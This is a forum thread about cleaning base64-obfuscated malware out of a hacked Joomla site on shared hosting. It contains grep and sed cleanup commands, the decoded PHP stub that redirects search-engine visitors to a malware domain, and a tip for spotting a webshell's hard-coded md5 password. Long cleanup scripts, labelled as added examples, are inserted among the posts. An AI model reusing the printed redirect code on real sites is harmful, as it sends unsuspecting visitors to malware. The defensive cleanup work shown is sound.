Find and replace command

livicrew
Level 1
Posts: 4
Joined: Thu Jan 05, 2012 9:31 am

Find and replace command

Postby livicrew » Thu Jan 05, 2012 9:41 am

Hi guys,

Recently I needed to clean up hacked code on my web server; I used the following to find the base64 coding:

Code:

find . -type f -name "*.php" -exec grep -H "eval(base64decode)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" {} \; > potentially_infected_files.txt

This gave me a list of infected files; I then manually deleted the scripting.

How could I use this command (or SED) to find the code in every file on the server and then replace it with a space?

Possibly a script I can run manually when I am suspicious of a compromise.
Any help would be much appreciated.

Habitual
Level 12
Posts: 4207
Joined: Sun Nov 21, 2010 8:31 pm
Location: Youngstown, Ohio

Re: Find and replace command

Postby Habitual » Thu Jan 05, 2012 9:45 am

Code:

# start in '.', escape '/**/' so sed matches it literally, and pass '\;' as its own argument
find . -name "*.php" -type f -exec sed -i 's/<?php \/\*\*\/ eval(base64_decode("DQplcn.*?>//g' {} \;


should remove them/it.

YMMV. Make backups.
Windows assumes you're an idiot.
Linux demands proof of it.

Habitual
Level 12
Posts: 4207
Joined: Sun Nov 21, 2010 8:31 pm
Location: Youngstown, Ohio

Re: Find and replace command

Postby Habitual » Thu Jan 05, 2012 9:48 am

BTW:

That reads

Code:

$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"yandex.ru") or stristr($referer,"rambler.ru") or stristr($referer,"mail.ru") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
   if (!stristr($referer,"cache") or !stristr($referer,"inurl")){      
      header("Location: http://newyrfhrh.bij.pl/");
      exit();
   }
}
}


which comes from

Code:

echo <long_string_after_'"eval(base64decode)" | base64 -d
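
The three steps the posts above carry out by hand (grep for the eval/base64_decode idiom, decode the payload with base64 -d to see what it does, then strip the injected line with sed after taking a backup), collected into one script as an added example; this is not code from the thread or from any of the posters. The web root, the file names and the base64 payload are constructed for the demonstration, and the sed pattern matches the exact one-line shape shown above rather than a greedy `.*?>`, so it does not eat legitimate code that shares the line.

```shell
#!/bin/sh
# Added example, not from the thread: the grep / base64 -d / sed steps the
# posts above do by hand, as functions that can be run over a web root.
# Root path, file names and the base64 payload below are all constructed.

# Exact shape of the injected line (sed BRE; '|' is used as the s||| delimiter
# so the '/' inside the pattern needs no escaping). Matching the whole block
# rather than '.*?>' keeps the deletion from swallowing real code on the line.
INJECT_RE='<?php /\*\*/ eval(base64_decode("[A-Za-z0-9+/=]*")); *?>'

# Print every PHP file under $1 that contains the eval(base64_decode( idiom.
find_infected() {
    find "$1" -type f -name '*.php' -exec grep -lF 'eval(base64_decode(' {} + | sort
}

# Decode the first base64_decode("...") argument in $1 so the payload can be
# read before anything is deleted (what the thread does with echo ... | base64 -d).
decode_payload() {
    grep -o 'base64_decode("[A-Za-z0-9+/=]*")' "$1" | head -n 1 \
        | sed 's/base64_decode("\(.*\)")/\1/' | base64 -d
}

# Keep a copy as $1.bak, then strip every injected block from $1.
clean_file() {
    cp -p "$1" "$1.bak"
    sed "s|$INJECT_RE||g" "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

# Constructed sample web root: one injected file, one clean file.
make_sample_root() {
    sample_root=$(mktemp -d)
    mkdir -p "$sample_root/components"
    payload=$(printf '%s' "echo 'sample';" | base64 | tr -d '\n')
    printf '<?php /**/ eval(base64_decode("%s")); ?>\n<?php echo "page"; ?>\n' \
        "$payload" > "$sample_root/components/index.php"
    printf '<?php echo "clean"; ?>\n' > "$sample_root/clean.php"
    printf '%s\n' "$sample_root"
}

# Demo run over the constructed root.
root=$(make_sample_root)
for f in $(find_infected "$root"); do
    echo "infected: $f"
    echo "payload:  $(decode_payload "$f")"
    clean_file "$f"
done
echo "still infected after cleaning: $(find_infected "$root" | wc -l)"
```

Point `find_infected` at the real document root instead of the constructed one; read what `decode_payload` prints for each hit before calling `clean_file`, since the decoded text is the only way to tell a redirect stub from something that also writes files or creates accounts.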

livicrew
Level 1
Posts: 4
Joined: Thu Jan 05, 2012 9:31 am

Re: Find and replace command

Postby livicrew » Thu Jan 05, 2012 10:05 am

Thanks for that, I will make very good use of it.

How did you 'read' the file? Also, can I find the password he used in his script?

I read this, and the guy managed to read the password: blog.kejsarmakten.se/all/software/2011/01/14/malware-in-joomla.html. This was the exact hack I had.

This would be useful, as I could delete every backdoor on my website using his script.

Thanks again

Peter

Habitual
Level 12
Posts: 4207
Joined: Sun Nov 21, 2010 8:31 pm
Location: Youngstown, Ohio

Re: Find and replace command

Postby Habitual » Thu Jan 05, 2012 10:24 am

Peter:

So you are running Joomla?
You do realize that all PHP scripts are now suspect?
This is shared hosting or not?

I 'found' it with terminal >

Code:

echo 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 | base64 -d


Password...? It's a common redirect that says "you're going to visit http://newyrfhrh.bij.pl/" if you come from {list_of_referrers}.
"It took us a long time to notice the attack since the only visible change they made to the website was to redirect google searches from our website to malware websites in Poland."
This is a first step in many attacks, but it is actually the symptom of a hack. What does

Code:

# one start point: `pwd` and . are the same tree, so listing both printed every hit twice
find "$(pwd)" -name z.php -exec less {} \;
show us?
The password is usually hard-coded in a PHP file somewhere (in clear or obfuscated text).

Is http://blog.kejsarmakten.se/all/softwar ... oomla.html your article?

Tighten up Joomla if you run it and never run joomla if you don't.
More holes than a Microsoft Product IMO.
Only thing worse is telnet.

Joomla gallery components are a popular target.

I learned 80% of this by extensive reading at
http://blog.unmaskparasites.com/ and
http://25yearsofprogramming.com/blog/

Lemme know...

Subscribed with interest...

JJ

livicrew
Level 1
Posts: 4
Joined: Thu Jan 05, 2012 9:31 am

Re: Find and replace command

Postby livicrew » Thu Jan 05, 2012 10:29 am

Hi

It's not my article; I found it while working on my hack on my Joomla website. It appears the com_oziogallery had a backdoor; I have removed ozio. Also, I use Coppermine galleries, which also had/has a backdoor; I have the latest version, but I am still not sure how secure it is.

I am on shared hosting.

Habitual
Level 12
Posts: 4207
Joined: Sun Nov 21, 2010 8:31 pm
Location: Youngstown, Ohio

Re: Find and replace command

Postby Habitual » Thu Jan 05, 2012 10:38 am

Peter:

livicrew wrote:... Also, can I find the password he used in his script?


Terminal >

Code:

# pattern in single quotes so the shell does not expand $auth_pass to nothing; -H shows which file matched
find "$(pwd)" -type f -name "*.php" -exec grep -H '$auth_pass' {} \;


IF you get a "63a9f0ea7bb98050796b649e85481845" in the output/string, the password is "root" (no quotes)

livicrew wrote:...as I could delete every backdoor onto my website using his script.

Without better Joomla security, it will just come right back.

All Files except .cgi should be 644
All directories should be 755

Shared hosting. Ugh.

Should you decide that you need a more in-depth investigation and solution, send me a PM with your everyday email address and we can continue discussing your Security and/or remedy.

JJ
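
The two follow-up checks from this post (the hard-coded $auth_pass and the 644/755 baseline), as an added example rather than anything posted in the thread. The web root and the sample files are constructed for the demonstration; the md5 helper only confirms that the digest quoted above is the md5 of the word root, and the permission functions apply exactly the baseline stated in the post.

```shell
#!/bin/sh
# Added example, not from the thread: the $auth_pass search and the 644/755
# permission baseline from the post above, as re-runnable checks. The web root
# and file contents are constructed for the demonstration.

# file:line for every PHP file assigning $auth_pass. grep -F takes the pattern
# literally and the single quotes stop the shell expanding $auth_pass to nothing.
find_auth_pass() {
    find "$1" -type f -name '*.php' -exec grep -HnF '$auth_pass' {} + | sort
}

# Is $1 (a hex md5 digest) the md5 of the word $2? Used to confirm the digest
# quoted above really is md5("root").
hash_matches_word() {
    [ "$1" = "$(printf '%s' "$2" | md5sum | cut -d' ' -f1)" ]
}

# List files (other than .cgi) not mode 644 and directories not mode 755.
report_bad_perms() {
    find "$1" -type f ! -name '*.cgi' ! -perm 644
    find "$1" -type d ! -perm 755
}

# Apply the baseline: 644 for files except .cgi, 755 for directories.
normalize_perms() {
    find "$1" -type f ! -name '*.cgi' -exec chmod 644 {} +
    find "$1" -type d -exec chmod 755 {} +
}

# Constructed sample: a world-writable dir holding a z.php with the digest
# quoted in the post, a clean index.php and a .cgi that keeps its execute bit.
make_sample_root() {
    sample_root=$(mktemp -d)
    mkdir -p "$sample_root/tmp"
    chmod 777 "$sample_root/tmp"
    printf '<?php $auth_pass = "63a9f0ea7bb98050796b649e85481845"; ?>\n' \
        > "$sample_root/tmp/z.php"
    chmod 666 "$sample_root/tmp/z.php"
    printf '<?php echo "clean"; ?>\n' > "$sample_root/index.php"
    printf '#!/bin/sh\necho ok\n' > "$sample_root/hello.cgi"
    chmod 755 "$sample_root/hello.cgi"
    printf '%s\n' "$sample_root"
}

# Demo run over the constructed root.
root=$(make_sample_root)
echo "files assigning \$auth_pass:"; find_auth_pass "$root"
for h in $(grep -o '[0-9a-f]\{32\}' "$root/tmp/z.php"); do
    hash_matches_word "$h" root && echo "$h is md5(\"root\")"
done
echo "out of baseline before:"; report_bad_perms "$root"
normalize_perms "$root"
echo "out of baseline after (expect nothing):"; report_bad_perms "$root"
```

Running `report_bad_perms` on a schedule and diffing its output against the previous run is a cheap way to notice a dropped webshell or a newly world-writable upload directory between full scans.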

Habitual
Level 12
Posts: 4207
Joined: Sun Nov 21, 2010 8:31 pm
Location: Youngstown, Ohio

Re: Find and replace command

Postby Habitual » Thu Jan 05, 2012 10:43 am

Peter:

livicrew wrote:...It appears the com_oziogallery had a backdoor, I have removed ozio. Also I use coppermine galleries which also had/has a backdoor, I have the latest version, but still not sure how secure it is.


Got backup?

livicrew
Level 1
Posts: 4
Joined: Thu Jan 05, 2012 9:31 am

Re: Find and replace command

Postby livicrew » Thu Jan 05, 2012 10:57 am

Thanks for that. I will keep my eye on it and if I need help, I will give you a shout.

Maybe I should go back to a 'normal' website and drop Joomla!

Habitual
Level 12
Posts: 4207
Joined: Sun Nov 21, 2010 8:31 pm
Location: Youngstown, Ohio

Re: Find and replace command

Postby Habitual » Thu Jan 05, 2012 11:26 am

Peter:

Check your PMs...